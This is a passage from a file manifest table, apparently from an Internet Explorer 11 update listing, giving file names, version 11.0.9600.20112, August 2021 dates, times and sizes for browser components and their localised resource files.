\nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 47,616 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 48,640 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 51,200 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 50,688 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 49,664 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 50,176 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 49,152 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 48,640 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 50,176 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 48,640 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 49,664 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 48,640 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 48,128 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 49,152 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 48,128 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 35,328 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 35,328 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 35,328 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 9,728 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 10,752 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:19| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 9,728 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 10,752 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 11,264 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:19| 9,728 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 10,752 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 10,752 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 9,216 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 10,752 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 7,680 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 7,680 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 9,728 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 10,752 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 10,752 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 10,752 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 9,728 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 9,728 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 6,656 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 6,656 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 6,656 \nwininet.dll| 11.0.9600.20112| 13-Aug-2021| 19:27| 4,387,840 \njsproxy.dll| 11.0.9600.20112| 13-Aug-2021| 19:58| 47,104 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 114,176 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 130,560 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:19| 124,928 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 122,880 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 130,048 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 138,240 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 20:19| 114,688 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 131,584 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 117,760 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 122,368 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 134,144 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 107,008 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 123,392 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 127,488 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 128,512 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 88,576 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 82,944 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 125,440 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 123,392 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 120,320 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 130,560 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 129,024 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 125,952 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 129,024 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 128,000 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 123,904 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 129,024 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 123,904 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 124,416 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 121,856 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 115,712 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 123,904 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 125,440 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 72,704 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 73,728 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 73,728 \niedkcs32.dll| 18.0.9600.20112| 19-Aug-2021| 18:17| 341,920 \ninstall.ins| Not versioned| 13-Aug-2021| 17:57| 464 \nieapfltr.dat| 10.0.9301.0| 20-Mar-2021| 20:53| 616,104 \nieapfltr.dll| 11.0.9600.20112| 13-Aug-2021| 19:16| 710,656 \ntdc.ocx| 11.0.9600.20112| 13-Aug-2021| 19:44| 73,728 \nDiagnosticsHub.DataWarehouse.dll| 11.0.9600.20112| 13-Aug-2021| 20:06| 489,472 \niedvtool.dll| 11.0.9600.20112| 13-Aug-2021| 20:33| 772,608 \nDiagnosticsHub_is.dll| 11.0.9600.20112| 13-Aug-2021| 20:07| 38,912 \ndxtmsft.dll| 11.0.9600.20112| 13-Aug-2021| 19:49| 415,744 \ndxtrans.dll| 11.0.9600.20112| 13-Aug-2021| 19:41| 280,064 \nMicrosoft-Windows-IE-F12-Provider.ptxml| Not versioned| 13-Aug-2021| 18:03| 11,892 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:19| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:19| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 3,584 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 3,584 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 4,096 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 3,584 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 3,584 \nF12.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 3,584 \nDiagnosticsTap.dll| 11.0.9600.20112| 13-Aug-2021| 19:48| 175,104 \nF12Resources.dll| 11.0.9600.20112| 13-Aug-2021| 20:10| 10,948,096 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:19| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:19| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 2,048 \nF12Tools.dll| 11.0.9600.20112| 13-Aug-2021| 19:47| 256,000 \nF12.dll| 11.0.9600.20112| 13-Aug-2021| 19:39| 1,207,808 \nmsfeeds.dll| 11.0.9600.20112| 13-Aug-2021| 19:35| 696,320 \nmsfeeds.mof| Not versioned| 13-Aug-2021| 18:11| 1,518 \nmsfeedsbs.mof| Not versioned| 13-Aug-2021| 18:11| 1,574 \nmsfeedsbs.dll| 11.0.9600.20112| 13-Aug-2021| 19:42| 52,736 \nmsfeedssync.exe| 11.0.9600.20112| 13-Aug-2021| 20:04| 11,776 \nhtml.iec| 2019.0.0.20112| 13-Aug-2021| 20:03| 341,504 \nmshtmled.dll| 11.0.9600.20112| 13-Aug-2021| 19:41| 76,800 \nmshtmlmedia.dll| 11.0.9600.20112| 13-Aug-2021| 19:33| 1,155,584 \nmshtml.dll| 11.0.9600.20112| 13-Aug-2021| 20:33| 20,294,144 \nmshtml.tlb| 11.0.9600.20112| 13-Aug-2021| 20:13| 2,724,864 \nMicrosoft-Windows-IE-HTMLRendering.ptxml| Not versioned| 13-Aug-2021| 18:03| 3,228 \nieetwcollector.exe| 11.0.9600.20112| 13-Aug-2021| 19:56| 104,960 \nieetwproxystub.dll| 11.0.9600.20112| 13-Aug-2021| 20:03| 47,616 \nieetwcollectorres.dll| 11.0.9600.20112| 13-Aug-2021| 20:13| 4,096 \nielowutil.exe| 11.0.9600.20112| 13-Aug-2021| 19:57| 221,184 \nieproxy.dll| 11.0.9600.20112| 13-Aug-2021| 19:14| 310,784 \nIEShims.dll| 11.0.9600.20112| 13-Aug-2021| 19:18| 290,304 \nWindows Pop-up Blocked.wav| Not versioned| 20-Mar-2021| 21:02| 85,548 \nWindows Information Bar.wav| Not versioned| 20-Mar-2021| 21:02| 23,308 \nWindows Feed Discovered.wav| Not versioned| 20-Mar-2021| 21:02| 19,884 \nWindows Navigation Start.wav| Not versioned| 20-Mar-2021| 21:02| 11,340 \nbing.ico| Not versioned| 20-Mar-2021| 20:55| 5,430 \nieUnatt.exe| 11.0.9600.20112| 13-Aug-2021| 19:56| 115,712 \nMicrosoft-Windows-IE-InternetExplorer-ppdlic.xrm-ms| Not versioned| 19-Aug-2021| 20:18| 2,956 \njsprofilerui.dll| 11.0.9600.20112| 13-Aug-2021| 19:43| 579,584 \nMemoryAnalyzer.dll| 11.0.9600.20112| 13-Aug-2021| 19:53| 1,399,296 \nMshtmlDac.dll| 11.0.9600.20112| 13-Aug-2021| 20:02| 64,000 \nnetworkinspection.dll| 11.0.9600.20112| 13-Aug-2021| 19:39| 1,075,200 \noccache.dll| 11.0.9600.20112| 13-Aug-2021| 19:40| 130,048 \ndesktop.ini| Not versioned| 20-Mar-2021| 20:54| 65 \nwebcheck.dll| 11.0.9600.20112| 13-Aug-2021| 19:35| 230,400 \ndesktop.ini| Not versioned| 20-Mar-2021| 20:54| 65 \nmsrating.dll| 11.0.9600.20112| 13-Aug-2021| 19:43| 168,960 \nicrav03.rat| Not versioned| 20-Mar-2021| 20:54| 8,798 \nticrf.rat| Not versioned| 20-Mar-2021| 20:54| 1,988 \niertutil.dll| 11.0.9600.20112| 13-Aug-2021| 20:07| 2,308,608 \nsqmapi.dll| 6.2.9200.16384| 19-Aug-2021| 18:17| 228,232 \nie4uinit.exe| 11.0.9600.20112| 13-Aug-2021| 19:34| 692,224 \niernonce.dll| 11.0.9600.20112| 13-Aug-2021| 19:58| 30,720 \niesetup.dll| 11.0.9600.20112| 13-Aug-2021| 20:04| 62,464 \nieuinit.inf| Not versioned| 13-Aug-2021| 18:56| 16,303 \ninseng.dll| 11.0.9600.20112| 13-Aug-2021| 19:44| 91,136 \nTimeline.dll| 11.0.9600.20112| 13-Aug-2021| 19:43| 154,112 \nTimeline_is.dll| 11.0.9600.20112| 13-Aug-2021| 19:58| 124,928 \nTimeline.cpu.xml| Not versioned| 20-Mar-2021| 20:54| 3,197 \nVGX.dll| 11.0.9600.20112| 13-Aug-2021| 19:41| 818,176 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 2,066,432 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:19| 2,121,216 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:19| 2,075,648 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:19| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 2,063,872 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 2,314,240 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 2,390,528 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 3,584 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:19| 2,033,152 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:19| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 2,307,584 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 2,255,872 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 2,061,312 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 2,326,016 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 3,584 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 2,019,840 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 2,071,040 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 2,082,816 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 3,584 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 2,307,584 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 2,170,368 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 2,153,984 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 2,291,712 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 2,283,520 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 2,052,096 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 2,301,952 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 3,584 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 2,093,056 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 2,075,648 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 2,299,392 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 2,094,592 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 2,316,800 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 3,584 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 2,305,536 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 2,278,912 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 2,285,568 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 3,584 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 2,060,288 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 2,315,776 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 2,279,424 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 2,324,992 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 2,098,176 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 1,890,304 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 1,890,304 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 3,072 \nieframe.dll| 11.0.9600.20112| 13-Aug-2021| 19:47| 13,881,856 \nieui.dll| 11.0.9600.20112| 13-Aug-2021| 19:58| 476,160 \nieframe.ptxml| Not versioned| 13-Aug-2021| 18:03| 24,486 \nieinstal.exe| 11.0.9600.20112| 13-Aug-2021| 19:41| 475,648 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:18| 463,373 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:18| 751,393 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:19| 526,345 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:20| 499,704 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:20| 552,385 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:21| 944,608 \nInetRes.adml| Not versioned| 19-Aug-2021| 20:19| 457,561 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:22| 543,996 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:22| 751,291 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:23| 526,607 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:24| 575,888 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:24| 463,373 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:25| 751,492 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:26| 570,786 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:26| 548,169 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:27| 639,283 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:28| 525,516 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:28| 751,380 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:29| 751,403 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:30| 488,537 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:30| 548,546 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:31| 559,391 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:32| 535,116 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:32| 541,506 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:33| 751,385 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:34| 804,522 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:34| 751,502 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:35| 751,349 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:35| 751,327 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:36| 503,959 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:37| 751,523 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:37| 521,630 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:38| 751,288 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:39| 420,094 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:39| 436,663 \nInetRes.adml| Not versioned| 19-Aug-2021| 18:40| 436,663 \ninetres.admx| Not versioned| 20-Mar-2021| 21:22| 1,678,023 \nMsSpellCheckingFacility.exe| 6.3.9600.20112| 13-Aug-2021| 19:51| 668,672 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 29,184 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:19| 32,768 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 33,280 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 35,328 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 37,888 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:19| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 34,304 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 33,280 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 34,304 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 27,648 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 29,696 